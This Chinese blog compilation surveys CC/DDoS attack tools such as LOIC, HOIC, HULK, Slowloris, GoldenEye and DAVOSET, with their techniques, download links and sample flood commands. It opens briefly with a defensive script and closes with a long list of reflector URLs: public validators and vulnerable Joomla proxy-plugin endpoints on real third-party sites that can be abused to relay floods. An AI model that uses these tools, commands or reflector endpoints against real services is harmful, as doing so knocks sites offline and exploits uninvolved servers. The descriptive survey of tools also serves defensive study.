精华内容
下载资源
问答
  • 一款Linux轻量级CC攻击防御工具
    2021-05-12 15:05:57

    本工具转自https://zhangge.net/5066.html

    一、功能申明

    分享之前我必须先申明一下,众所周知,DDoS攻击指的是分布式拒绝服务。而CC攻击只是DDoS攻击的一种,本文所阐述的CC攻击,指的是单个IP达到我们设定好的阈值并发请求,而非海量IP的低并发攻击!对于个人低配服务器,除了使用CDN来防护,至少我是没有想到如何抵挡海量IP攻击的!因为每个IP都模拟正常的用户浏览器请求,并不会触发防御阈值,同时来1000个,甚至上万个,个人低配服务器的带宽在第一时间就会被占满,就无法继续提供服务了。

    当然,用脚本也是无法防御DDoS大流量攻击的,因为所有机房的防御带宽是有限的,当攻击的流量超过了机房的防御带宽,要么机房把你的服务器IP拉黑洞,要么就一起死。因此,如果你的服务器正遭受大流量攻击,比如几十G上百G,一般机房或CDN节点都是扛不住的,脚本也无能为力了,赶紧换高防服务器吧!

    二、功能介绍

    通过以上申明,也就大致给CCKiller一个定位:CCKiller是用于个人低配服务器的轻量级CC攻击防御,可以抵挡单个IP产生的高并发攻击。

    目前设计的功能特性如下:

    ①、秒级检查

    很多人写的防御脚本都是使用了Linux系统的计划任务crontab来定时检查的。而crontab的最细颗粒是1分钟,也就是说脚本最快也只能1分钟检查一次。对于一些强迫症来说就会很不爽。

    所以,我还是按照以前分享的思路,利用while循环实现秒级检查,实现更细的颗粒。当然,CCKiller更是被我写成了系统服务,更加灵活稳定。

    ②、拉黑时长

    CCKiller可以设置拉黑时长,默认为10分钟。当发现有恶意请求时,会自动拉黑目标IP,并在拉黑时长结束后自动释放,这个功能算是对我之前写的脚本的一个大的改进。

    ③、并发阈值

    CCKiller 可以设定单个IP的最高请求数,如果某个IP同时请求数超过了设定的阈值,就会被暂时拉黑一段时间。

    ④、邮件发送

    这个功能没啥好说的,意义并不大。而且发送成功率和服务器的环境也有很大关系。

    ⑤、并发显示

    安装后,直接运行cckiller会列出当前系统的请求排行,可以清晰的看到当前请求IP和并发数。使用-s参数还可以继续定制需求,比如 cckiller -s 10 就能显示当前并发数排行前10名的IP。

    ⑥、手动拉黑

    支持手动拉黑,执行后会立即检查,将并发请求超过n的IP拉黑一段时间,比如 cckiller -k 100 就会将目前超过100个请求的IP拉黑一段时间,如果没有则不会执行任何拉黑操作。

    三、工具安装

    ①、在线安装

    由于我可能经常会更新一些功能,或修复一些BUG,所以仅提供在线安装,以保证脚本是最新的。

    安装非常简单,执行如下命令就能进入配置步骤了:

    更多相关内容
  • CC攻击工具list

    千次阅读 2019-09-27 11:14:41
    从论文里抠出来的工具列表如下,后面有...1. 超强CC攻击器:只要输入攻击目标服务器的IP地址,设置好相关参数即可进行攻击。可设置攻击线程、攻击频率,利用大量代理服务器形成僵尸网络(设置代理服务器ip列表)。CC...

    从论文里抠出来的工具列表如下,后面有黑产的工具以及网络上摘录的工具:

    分类:(1)有僵尸网络(是否代理服务器)&没有的==》(2)单一url&混合url(多线程,压测为主,demo工具居多)

     

    1. 超强CC攻击器:只要输入攻击目标服务器的IP地址,设置好相关参数即可进行攻击。可设置攻击线程、攻击频率,利用大量代理服务器形成僵尸网络(设置代理服务器ip列表)。CC攻击工具致命攻击V2.0有大量的代理服务器。暗影DDoS压力测试系统V2016。

    2. DDoSIM可用于模拟对目标服务器的DDoS攻击,能模拟几个僵尸主机(IP地址具有随机性),这些主机与目标服务器建立完整的TCP连接。连接完成后,DDoSim启动与侦听应用程序如HTTP服务器的会话(?模拟正常用户访问的url???---仅仅是针对80端口发起正常的http请求,url就是/,多线程支持)。

    3. Darkddoser通过僵尸网络发起http攻击。

    4. 使用Microsoft Web Application Stress工具模拟HTTP-DDoS 攻击,采用直接访问测试页面的方式发起攻击。三台攻击机,每台攻击机最高并发1000线程(基于频率可检测、实验设置低频。。。自写的工具),迫使服务器执行大量计算和数据库查询,每次攻击时间为5分钟。

    5. Web Apple Pid DDoS攻击器:可设置目标服务器的页面(静态/动态)(单一、多个???,自写的工具)、攻击频率等。

    6. LOIC是Web应用程序的Dos/DDos攻击,它可用TCP数据包、UDP数据包、HTTP请求对目标网站进行Dos/DDos测试,攻击手段主要是以无限循环方式(无僵尸网络、单一url)发送数据。是一种淹没式工具,能产生大量流量,占满目标网络或应用资源,造成拒绝服务。

    7. XOIC仅支持win7以上的Windows平台,比LOIC增加了Testmode模式,可以测试攻击主机的性能。

    8. HOIC可以配置攻击脚本,实际靠大量的HTTP请求进行DoS。其具有如下特点:高速多线程的HTTP洪水攻击;一次可同时洪水攻击高达256个网站;内置脚本系统,允许自行修改设置脚本,用来阻挠DDoS攻击的防御措施,并增加DOS输出;能够选择攻击的线程数。(僵尸网络???单一or多个url???)

    9. HULK:针对Web的拒绝服务攻击工具。能够在web服务器上产生许多单一的伪造浏览,伪造常见的参数名称和参数值,绕开引擎的缓存池(单一url、GOMAXPROCS=4 HULKMAXPROCS=4096 hulk -site http://example.com/example.php 2>/tmp/errlog)。

    10. WAS(web application stress tool是微软的一款性能测试工具,可以通过有限的客户端模拟大量的虚拟用户,并发地访问预先确定的页面或网站的URLs。每一个虚拟用户都能精确地仿效真实用户并在真实浏览器和网站服务器之间进行交互(https://www.90.vc/archives/11,压测工具,录制脚本,可以多个url,多线程)。

    11. Hping是一个基于命令行,编码和解析的TCP/IP协议的开源工具。也可以用于发动DDOS攻击,常用于发动ICMP、SYN和UDP洪水攻击等(pass,无应用层ddos)。

    12. 利用Httperf模拟针对Web服务器的DDoS攻击:通过设置hostname/IP address、url、请求速率、连接总数和服务器的反馈时间来模拟不同强度的分布式拒绝服务攻击。过程中需控制多台僵尸主机(httperf --client=0/1 --server=[YOUR_DOMAIN] --port=443 --uri=/a.php --rate=100 --send-buffer=4096 --recv-buffer=16384 --ssl --num-conns=50 --num-calls=1000,单一url、不排除同时多个url并发)。

    采用Httperf与Autobench相结合的方式来模拟应用层DDoS攻击,访问的服务器对象为某一校园网站。首先,直接通过抓包工具libpcap捕获正常用户的访问行为及数据包情况(性能测试工具)。其次是模拟应用层DDoS攻击行为。然后,分别对一定时间段内正常访问IP及攻击用户IP的数据包进行分析处理,提取相应的指标,并对指标数据进行预处理(autobench 是一款基于httperf的Perl脚本。它会在一次测试中调用多次httperf来对web服务器进行测试,每次会按照给定的参数增加并发连接数,将 httperf的测试结果保存为CSV格式的文件)。

    13. SlowHTTPTest:可配置的应用层拒绝服务攻击测试攻击。可以模拟低带宽耗费下的DoS攻击,如慢速攻击、通过并发连接池进行的慢速读攻击等(SlowHTTPTest是一款对服务器进行慢攻击的测试软件,所谓的慢攻击就是相对于cc或者DDoS的快而言的,并不是只有量大速度快才能把服务器搞挂,使用慢攻击有时候也能到达同一效果。slowhttptest包含了之前几种慢攻击的攻击方式,包括slowloris, Slow HTTP POST, Slow Read attack等。那么这些慢攻击工具的原理就是想办法让服务器等待,当服务器在保持连接等待时,自然就消耗了资源。Slowhttptest的源码托管在Github:https://github.com/shekyan/slowhttptest, pass)。

    14. Slowloris:属于Perl程序,只需在对应的SDK中运行即可。其攻击分为探测、实施两个步骤。探测的主要目的是探测目标服务器连接超时时间。实施攻击时可用单台主机也可选择数台主机并发攻击,选择多台主机产生的攻击效果更大(攻击192.168.0.1路由器网关。slowloris.py -s 999 -ua 192.168.0.1 –s 999 发送999个socket包。-ua 使用随机User Agent。pass)。

    15. 通过Music Machines-HTTP真实数据集搭建模拟真实网站,使用BadBoy录制攻击脚本,使用Apache Jmeter模拟傀儡主机进行模拟攻击行为。Apache Jmeter用于测试服务器功能和测量服务器性能。可用于测试静态和动态Web程序的性能。可用于模拟服务器或服务器组、网络对象的重负载请求,从而测试其强度,并分析在不同负载类型下测试对象的整体性能。(http://www.cnblogs.com/TankXiao/p/4045439.html,压测工具,可以设置多个url,多线程)

     

    其他:DaRK DDoSeR 5.6c远控 破解版,CC攻击小助手(自写),在网上搜索代理服务器和CC攻击工具致命攻击V2.0(自写)、暗影DDoS压力测试系统V2016(http://www.greatddos.com/content/?134.html,cc攻击,单url,多线程)

     

    数据集:中南大学可视化研究组提供的《VAST Challenge 2013-mini challenge 3,网络安全日志数据集》,包含了一个国际大公司的计算机网络运维日志,包括:两周的Netflow和Bigbrother(主机状态监控)日志,一周的防火墙日志和Web访问日志。

     

     

    更多地下黑产ddos cc工具见:

    DDOS工具合集---CC 2.0(僵尸网络proxy,单一url,可设置cookie,refer),传奇克星(代理+单一url,可设置cookie),NetBot_Attacker网络僵尸1.0(僵尸网络,HTTP NO-Cache Get攻击模式,CC攻击,HTTP空GET请求攻击),傀儡僵尸VIP1.4版(僵尸网络,动态单一url)、上兴网络僵尸2.3、中国制造网络僵尸、安全基地网络僵尸==

     

    一个三年前的文章列的ddos工具:

     

    工具名称描述攻击类型
    LOICLOIC是一款专著于web应用程序的Dos/DDOS攻击工具,它可以用TCP数据包、UDP数据包、HTTP请求于对目标网站进行DDOS/DOS测试,不怀好意的人可能利用LOIC构建僵尸网络。LOIC是用C#语言写的,这是一个C#新手的练手作品,靠GUI界面吸引了不明真相的小白们使用。由于程序设计上”有意或无意”留下的BUG导致” 一旦开始攻击在退出进程前无法真正停止攻击“,潜在增大了攻击效果。攻击手段主要是以无限循环方式发送大量数据,并无其它特色。针对单个IPAndroid平台下LOIC 程序主界面如下,攻击测试选取的是HTTP image001UDP/TCP/HTTP GET
    Xoicimage003相对于LOIC的多平台(GNU/Linux, Windows, Mac OS以及Android),XOIC可运行的环境则少的多,仅支持win7以上的Windows平台。image005攻击方式上多了ICMP FLOOD。下面是作者列出的工具特色:image006和LOIC相比,工具主打的还是流量型攻击,不过相比前者增加了Testmode模式,可以测试攻击主机的性能。 另外,在实际的测试中发现了工具的一个小BUG。image008反编译后的关键代码如下:image010TCP/UDP/ICPM/HTTP GET
    HOICHOIC是High Orbit Ion Cannon(高轨道离子炮)的缩写,一款用RealBasic开发的DoS工具。最初一些人使用LOIC进行DoS,后来这些人被捕了,另外一些人开发了HOIC以示抗议。(在工具的攻击包中,有一个说明:Brothers one of our aids has been arrested and detained for merely using the loic we must show them that this is a mistake) RealBasic是一种类似VB6的编程语言,可以生成在Windows、Linux、Mac OS上运行的应用程序。HOIC是完全开源的,zip包中的hoic.rbp是RealBasic源码HOIC会从目标URL从一个Array中随机抽取,Referer、User-Agent分别从一个Array中随机抽取,另有一些随机的HTTP Headers。所有内容都是可定制的,发送出去的HTTP请求有很多变种HOIC只能发动合法的HTTP攻击。HOIC的HTTP攻击报文内容是通过一个.hoic文件进行控制的,这个.hoic文件里可以添加多个目标URL、Refer、User-Agent等内容。HOIC的攻击报文会从这些目标URL、Refer等字段中随即抽取,组成一个http攻击报文发送.HOIC攻击实际是靠大量正常HTTP请求进行DoS,如果有基于某些阈值的异常行为检测方案,完全可以有效检测、阻断HOIC攻击。类似NSFOCUS ADS系列的专业DDoS防护产品完全可以应对HOIC攻击。HTTP GET
    HULKHULK是一种web的拒绝服务攻击工具。它能够在web服务器上产生许多单一的伪造流量,能绕开引擎的缓存,因此能够直接攻击服务器的资源池。hulk的特别之处在于:对于每一个请求都是独特的,能够绕开引擎的缓存直接作用于服务器的负载。hulk使用的技术:源客户的混淆——通过一个User Agent的已知列表,每http一个请求的用户代理都是随机来自于已知列表。引用伪装——指向请求的referer是伪造的,要么指向主机自己,要么指向主要的已知站点。referer是产生请求的url。粘附性——使用标准的http请求去请求服务器,使用变化的的keep-alive时间窗保持连接建立不使用缓存——这是一个前提,向HTTP server请求no-cache,一个没有在背后cache service使用的server会呈现一个单独的页面。URL的独特组成——为了避免缓存和其他优化工具,HULK伪造了常见的参数名称和参数值,为了单一性,他们都是根据每个请求随机生成的,使得服务器就得处理每个事件的响应。HTTP GET
    srDOS该工具在与服务端建立连接后,在等待服务端发送数据,然后才会发送自己的攻击报文,这也是为什么没有后续的攻击报文通过查看反汇编的代码发现,该工具里有https握手相关的攻击TCPSSL
    DirtyJumperDirt Jumper 是一个通过botnet发动DDoS 攻击的toolkit.整体来看,由Dirt Jumper及其变种程序发起的攻击呈上升态势。原因不仅仅在于程序的简单易用,同时地下产业链相对成熟,从而得以广泛传播。从攻防角度上讲,Dirt Jumper攻击并没有引入新的方式,采用了比较传统的网络层和应用层攻击手段,防护并不困难。http gethttp postsyn flood
    Darkddoser通过僵尸网络发起的http 攻击 image013image015HTTP GET/POST/TCP/UDP
    SlowhttptestSlowhttptest是一个可以灵活配置的应用层攻击工具,它能发起诸如slowloris、Slow http post、slow read、slow range等工具实现的低带宽应用层拒绝服务攻击工具利用了http协议的一个特点——等待完整的http请求收到才会进行处理。如果一个http请求不完整,或者是在网络上慢速传递,http服务器会一直为这个请求保留资源等待它传输完毕。如果http服务器有太多的资源都在等待,这就构成了DosS 123223HTTP
    sslhamer模拟僵尸网络的攻击行为,与客户端建立三次握手之后,发送大量的垃圾报文。Copyright by NSFOCUSTCP/SSL
    hyenae可以安装在linux和windows下的攻击发包工具,灵活指定IP和发包速率,并且支持TCP/UDP/HTTP等多种协议;支持IPv6 image016TCP/UDP/HTTP
    killemall这套攻击软件是用python编写完成,主要用来进行cc攻击。作者宣称可以绕过ADS设备的HTTP redirect、HTTP Cookie、Javascript、CAPTCHA(图片验证码攻击)防护算法该攻击工具对HTTP redirect、HTTP Cookie的绕过速度比较快;该攻击工具需要借助v8引擎才能绕过javascript防护,而v8引擎的安装比较复杂; 在绕过CAPTCHA的概率上来说,该攻击工具绕过ADS的概率还是比较大的,但由于需要预先生成数据库,耗时较大;一旦ADS更新了图片验证码,则该工具就不能再继续绕过;该攻击工具只能使用本地真实源ip进行攻击,不能伪造源ip;HTTP
    dossimDdosim可以模拟几个僵尸主机 (局域网内随机IP地址)。 它创建完整的TCP连接到目标服务器. 在完成连接后, ddosim启动应用程序的对话与聆听 (如. HTTP服务器)ddosim是用C写的。Ddosim是通过发送报文、监听报文、回复报文这几个过程来模拟几个僵尸主机的。ddosim目前的攻击包括:(1)使用有效HTTP请求的DDoS(2)使用无效请求HTTP DDoS攻击 (类似的DC 攻击)(3 )DDoS攻击的SMTP(4)随机端口上的TCP连接攻击。HTTP
    pylorisPyLoris是一个测试服务器的脆弱性和连接拒绝服务(DoS)攻击的脚本工具,用python语言编写。 image018 PyLoris可以利用SOCKS代理和SSL连接,并可以针对如HTTP,FTP,SMTP,IMAP和远程登录等协议进行测试,这里主要关注HTTP攻击。PyLoric的http攻击是通过”request body”进行控制的,”request body”的内容可以自己修改。PyLoric首先和服务器建立连接,然后将”request body”里的内容拆分成一个字符一个字符的发送,每一个http报文只包含一个字符。HTTP漏洞型
    Slowloris header简单的来说是对HTTP服务器送出不完全的HTTP请求,并且试着让它保持不被HTTP服务器超时,如此一来HTTP服务器可开启的最大socket就会 满了,最后导致HTTP服务器无法提供服务。Slowloris是用perl脚本编写的。slowloris在这里又被称为slow headers,攻击截图如下: image020攻击的数据包如下:image022 其基本原理是制造不完整的header。完整的http请求头结尾应该是“0d0a0d0a”,而但攻击工具只发送“0d0a”。然后以固定的时间间隔,反复发送随机的key-value键值对,迫使服务器持续等待(至超时)。最终通过不间断的并发连接耗尽系统的最大连接数直至服务端DOS。 切换至HEX显示如下: image024HTTP
    Slow readSlow read攻击简单说就是,通过调整TCP协议头中的window size来控制双方的数据流速率,尽可能长的保持单次连接的交互时间,直至超时。 image026 要使这种攻击效果更加明显,请求的资源要尽量大,比如我这里的测试图片test.png,其大小为4M多。如果目标网站没有这么大的资源,但若其支持http_pipelining的话,可以采用在同一连接中多次请求同一资源的方法来增大返回内容。从捕获的数据包中可以看出,当请求 test.png资源时,客户端window size被刻意设置为1120字节。客户端缓冲区在被来自服务的数据填满后,发出了[TCP ZeroWindow]告警,迫使服务端等待。从交互开始到断开,单个连接耗费了14秒。捕获的数据: image028HTTP
    Slowlaris postSlow http post也称为Slow body。顾名思义,攻击的着眼点放在了发送内容的过程中。 image030 攻击数据包:image032 切换至HEX显示如下: image034 可以看到在这种攻击中,http header数据已被完整发送(注意0d0a0d0a),只是将http header中content-length字段设置为一个很大的值(这里是8192),同时不在一个包中发送完整post数据而是每间隔10秒(此值攻击者可以调整)发送随机的key-value键值对。可以看出,任何可以接收http post请求的网站,都有可能遭受此类攻击。HTTP
    torshammerTor’s Hammer是一个能发起缓慢 post dos攻击的测试工具。Torshammer也可以运行在tor网络中(此时会假定您通过127.0.0.1:9050运行tor)。通过一台机器,Torshammer就可以kill掉大多数没有受到保护的Apache和IIS服务器:Kill掉Apache 1.X 和老版本的IIS,只需要启用~128个线程,kill掉Apache2.X和 新版本的IIS,需要启用~256个线程可以通过Torshammer 直接发起HTTP post攻击(不支持get), 也可以通过Tor网络发动攻击。Torshammer的HTTP post攻击是首先向服务器发送一个post报文请求,如图6-1,然后再发送一系列随机的字符串(分多个报文发送,每个报文包含两个字符)。HTTP
    anonymous是一个工具集合,包含:HOIC,LOIC,DDOSIM,PYLORIS,SLOWLORIS,TORSHAMMER,SLOWHTTPGETN/A
    THC-IPV6针对IPV6的攻击工具集合 
    kadiaoni此类攻击的原理是通过Post一个字节的字符,保持住服务器的连接不断开,直到耗尽服务器的资源。HTTP
    glodeneyeGoldenEye(最新版本为2.1)是一个主打应用层(http flood)攻击的工具,从Hulk项目发展而来,同Hulk一样它也使用python编写,支持多平台运行,攻击方式上支持http get 、http post和random。工具特色:– 支持KeepAlive 和 NoCache功能- 随机化的http header- 可定义的User-Agent列表(默认随机)- 支持Android(GoldenEye 4 Android)平台HTTP
    DAVOSET最新版本为1.2)是一个perl脚本,有perl执行环境即可。与前面介绍的直连式的GoldenEye不同,它又被称之为Proxy Attacks,是借助有漏洞的、合法的第三方身份实施攻击而做到自身的隐藏,可以看作是更广泛意义上的反射攻击。而且Proxy Attacks可利用的反射点众多, 也使得这种攻击更加难以封堵。工具特色:- 利用代理发动攻击,一定程度上可以隐藏自身- 不定期更新可用的反射点- 反射点通常有较强的可交互性,容易绕过目标防护措施实施这种攻击最重要的是有众多可利用的反射点,攻击者可自己网络搜索,也可利用工具附带的完整列表。Proxy
    R.U.D.YR-U-Dead-Yet是一个HTTP post DOS攻击工具。它执行一个DOS攻击长表单字段,通过POST方法提交。 这个工具提供了一个交互式控制台菜单,检测给定的URL,并允许用户选择哪些表格和字段应用于POST-based DOS攻击。HTTP
    THC SSL DOS通过SSL-RENEGOTIATION的漏洞耗尽服务器资源SSL
    ZARPZarp是采用Python编写的、类似MSF的一款网络攻击测试框架。工具采用模块化设计,集漏洞扫描、嗅探、DDoS压力测试于一身。Zarp主要接口是一个CLI驱动的图形界面,采用多层菜单,使用起来相当方便。目前运行平台只限于linux,同时在安装之前要确保系统存在python2.7.x、git以及scapy。程序执行界面。 image036TCP

    from:http://blog.nsfocus.net/evolution-of-ddos-attack-tools/

     

    Tor's Hammer - Slow POST Denial Of Service Testing Tool  https://packetstormsecurity.com/files/98831/ Tor's Hammer is a slow post dos testing tool written in Python. It can also be run through the Tor network to be anonymized. If you are going to run it with Tor it assumes you are running Tor on 127.0.0.1:9050. Kills most unprotected web servers running Apache and IIS via a single instance. Kills Apache 1.X and older IIS with ~128 threads, newer IIS and Apache 2.X with ~256 threads.

    5、R-U-Dead-Yet

    R-U-Dead-Yet是一个HTTP post DOS攻击工具。它执行一个DOS攻击长表单字段,通过POST方法提交。 这个工具提供了一个交互式控制台菜单,检测给定的URL,并允许用户选择哪些表格和字段应用于POST-based DOS攻击。

    下载:

    https://code.google.com/p/r-u-dead-yet/

    6、 Tor's hammer

    Tor'hammer是另一个不错的DOS测试工具。 它是用Python编写的。 这个工具有一个额外的优势:它可以通过TOR匿名网络执行攻击。 这是一个非常有效的工具,它可以在几秒内杀了Apache和IIS服务器。

    下载:

    http://packetstormsecurity.com/files/98831/

    7、 PyLoris

    据说PyLoris是服务器的测试工具。它也可以用来执行DOS攻击。 这个工具可以利用 SOCKS代理和SSL连接服务器上执行DOS攻击。它可以针对各种协议,包括HTTP、FTP、SMTP、IMAP,Telnet。不像其他传统DOS攻击工具一样,其最新版本的软件添加了一个简单易用的GUI。

    下载:

    http://sourceforge.net/projects/pyloris/

    8、OWASP DOS HTTP POST

    这是另外一个很好的工具。您可以使用这个工具来检查您的web服务器能否够捍卫得住别人的DOS攻击。当然,不仅对防御,它也可以用来执行DOS攻击哦。

    下载:

    https://code.google.com/p/owasp-dos-http-post/ ==>https://www.owasp.org/index.php/Category:OWASP_Download

    9、DAVOSET

    DAVOSET是另一个很好的执行DDOS攻击工具。 最新版本的工具新增支持cookie以及许多其他功能。 您可以从Packetstormsecurity DAVOSET免费下载。

    下载:

    http://packetstormsecurity.com/files/123084/DAVOSET-1.1.3.html 使用perl写的可以利用代理网站或者僵尸网络对目标站点发起攻击,可以下载使用。--单一url攻击

    10、黄金眼(GoldenEye )HTTP拒绝服务工具

    黄金眼也是一个简单但有效的DOS攻击工具。 这是在Python测试开发的DOS攻击,但是人们也把它当做一种黑客工具了。

    下载:

    http://packetstormsecurity.com/files/120966/GoldenEye-HTTP-Denial-Of-Service-Tool.html ——和hulk类似的工具!单一url多进程攻击!

    from:http://www.sohu.com/a/222851810_653604

     

    代理服务器,不用是真的代理:比如,像这个check页面html代码的也可以发起攻击:

    https://validator.w3.org/nu/?showsource=yes&doc=http%3A%2F%2Fcn.bing.com%2F#cl5c12791

    davoset给的代理列表:

    http://www.google.com/ig/add?feedurl=
    http://regex.info/exif.cgi?url=
    http://anonymouse.org/cgi-bin/anon-www.cgi/
    http://www.google.com/translate?u=
    http://translate.google.com/translate?u=
    http://validator.w3.org/feed/check.cgi?url=
    http://www.w3.org/2001/03/webdata/xsv?style=xsl&docAddrs=
    http://validator.w3.org/check?uri=
    http://jigsaw.w3.org/css-validator/validator?uri=
    http://validator.w3.org/checklink?uri=
    http://qa-dev.w3.org/unicorn/check?ucn_task=conformance&ucn_uri=
    http://www.w3.org/RDF/Validator/ARPServlet?URI=
    http://www.w3.org/2005/08/online_xslt/xslt?xslfile=http%3A%2F%2Fwww.w3.org%2F2002%2F08%2Fextract-semantic.xsl&xmlfile=
    http://www.w3.org/2005/08/online_xslt/xslt?xmlfile=http://www.w3.org&xslfile=
    http://www.w3.org/services/tidy?docAddr=
    http://validator.w3.org/mobile/check?docAddr=
    http://validator.w3.org/p3p/20020128/p3p.pl?uri=
    http://validator.w3.org/p3p/20020128/policy.pl?uri=
    http://online.htmlvalidator.com/php/onlinevallite.php?url=
    http://feedvalidator.org/check.cgi?url=
    http://www.google.com/ig/adde?moduleurl=
    http://gmodules.com/ig/creator?url=
    http://www.cynthiasays.com/mynewtester/cynthia.exe?rptmode=-1&url1=
    http://www.watchmouse.com/en/checkit.php?c=jpcheckit&vurl=
    http://host-tracker.com/check_page/?furl=
    http://panel.stopthehacker.com/services/validate-payflow?email=1@1.com&callback=a&target=
    http://www.viewdns.info/ismysitedown/?domain=
    http://www.onlinewebcheck.com/check.php?url=
    http://www.online-translator.com/url/translation.aspx?direction=er&sourceURL=
    http://www.translate.ru/url/translation.aspx?direction=er&sourceURL=
    http://about42.nl/www/showheaders.php;POST;about42.nl.txt
    http://browsershots.org;POST;browsershots.org.txt
    http://fets3.freetranslation.com/?Language=English%2FSpanish&Sequence=core&Url=
    http://demo.geonode.org/proxy/?url=
    http://streamitwebseries.twww.tv/proxy.php?url=
    http://www.comicgeekspeak.com/proxy.php?url=
    http://67.20.105.143/bitess/plugins/content/plugin_googlemap2_proxy.php?url=
    http://antra.com/plugins/content/plugin_googlemap2_proxy.php?url=
    http://bemaxjavea.com/javea-rentals-alquileres/plugins/content/plugin_googlemap2_proxy.php?url=
    http://centrobrico.net/plugins/content/plugin_googlemap2_proxy.php?url=
    http://conodeluz.org/magnanet/plugins/content/plugin_googlemap2_proxy.php?url=
    http://greenappledentaldt.com/home/templates/plugins/content/plugin_googlemap2_proxy.php?url=
    http://html.strost.ch/dgi/plugins/content/plugin_googlemap2_proxy.php?url=
    http://ijzerhandeljanssen.nl/web/plugins/content/plugin_googlemap2_proxy.php?url=
    http://kobbeleia.net/joomla/plugins/content/plugin_googlemap2_proxy.php?url=
    http://krd-medway.co.uk/site/plugins/content/plugin_googlemap2_proxy.php?url=
    http://link2europe.com/joomla/plugins/content/plugin_googlemap2_proxy.php?url=
    http://mail.chineseblast.com/theyardbirds.narod.ru/plugins/content/plugin_googlemap2_proxy.php?url=
    http://mail.hostbuzzz.com/fish-sale.narod.ru/plugins/content/plugin_googlemap2_proxy.php?url=
    http://mail.topsclub.ru/graalis.narod.ru/plugins/content/plugin_googlemap2_proxy.php?url=
    http://mail.viarh.ru/hayes-house.narod.ru/plugins/content/plugin_googlemap2_proxy.php?url=
    http://minterne.co.uk/mjs/plugins/content/plugin_googlemap2_proxy.php?url=
    http://old.ucpb.org/plugins/content/plugin_googlemap2_proxy.php?url=
    http://pdllaurentino.it/plugins/content/plugin_googlemap2_proxy.php?url=
    http://peelmc.ca/plugins/content/plugin_googlemap2_proxy.php?url=
    http://s2p.lt/main/plugins/content/plugin_googlemap2_proxy.php?url=
    http://secofis.com/a/plugins/content/plugin_googlemap2_proxy.php?url=
    http://smartonecity.com/pt/plugins/content/plugin_googlemap2_proxy.php?url=
    http://snelderssport.nl/web/plugins/content/plugin_googlemap2_proxy.php?url=
    http://spanner-joos-vergaser.de/joomla/plugins/content/plugin_googlemap2_proxy.php?url=
    http://static.74.174.40.188.clients.your-server.de/decongroup.narod.ru/plugins/content/plugin_googlemap2_proxy.php?url=
    http://static.74.174.40.188.clients.your-server.de/homemuseum.narod.ru/plugins/content/plugin_googlemap2_proxy.php?url=
    http://static.74.174.40.188.clients.your-server.de/igor-lagutin.narod.ru/plugins/content/plugin_googlemap2_proxy.php?url=
    http://static.76.174.40.188.clients.your-server.de/gamesshops.narod.ru/plugins/content/plugin_googlemap2_proxy.php?url=
    http://static.76.174.40.188.clients.your-server.de/novoselie.narod.ru/plugins/content/plugin_googlemap2_proxy.php?url=
    http://sunnyhillsassistedliving.com/plugins/content/plugin_googlemap2_proxy.php?url=
    http://testserver.lv/salve/plugins/content/plugin_googlemap2_proxy.php?url=
    http://thevintagechurch.com/www2/index.php?url=/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.abc-haus.ch/reinigung/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.abs-silos.de/en/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.admksg.ru/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.alhambrahotel.net/site/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.aliento.ch/cms/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.autoklyszewski.pl/autoklyszewski/mambots/content/plugin_googlemap2_proxy.php?url=
    http://www.bareth-coaching.com/www/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.build.or.at/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.caiverbano.it/sito/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.cbcstittsville.com/home/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.cgrifo.com/demo/cabelo/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.ciutatdeivissa.org/portal/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.contrau.com.br/web/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.de-driesprong.com/cms/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.dierenhotelspaubeek.nl/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.fotorima.com/rima/site2/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.fr-ready.at/cncready/joomla/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.gaston-schul.nl/DU/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.gaston-schul.nl/FR/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.gillinghamgurdwara.co.uk/site/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.gilmeuble.ch/cms/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.hortonmccormick.com/cms/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.icel.be/cms/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.idea-designer.com/idea/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.jana-wagenknecht.de/wcms/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.kanzlei-berendes.de/homepage/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.kita-spielhaus.de/cms/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.kjg-hemer.de/joomla/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.labonnevie-guesthouse-jersey.com/site/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.lacasaencarilo.com.ar/sitio/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.linguamatic.com/web/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.losaromos-spa.com.ar/cms/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.losaromos-spa.com.ar/~losaromo/cms/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.multicart.com.br/hcz.com.br/home/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.nahmiashnos.cl/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.nickclift.co.uk/web/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.oliebollen.me/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.palagini.it/palagini/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.paro-nl.com/v2/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.parsifaldisco.com/joomla/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.podosys.com/csm/plugins/content/plugin_googlemap2_proxy.php?url=
    http://www.precak.sk/penzion/plugins/content/plugin_googlemap2_proxy.php?url=
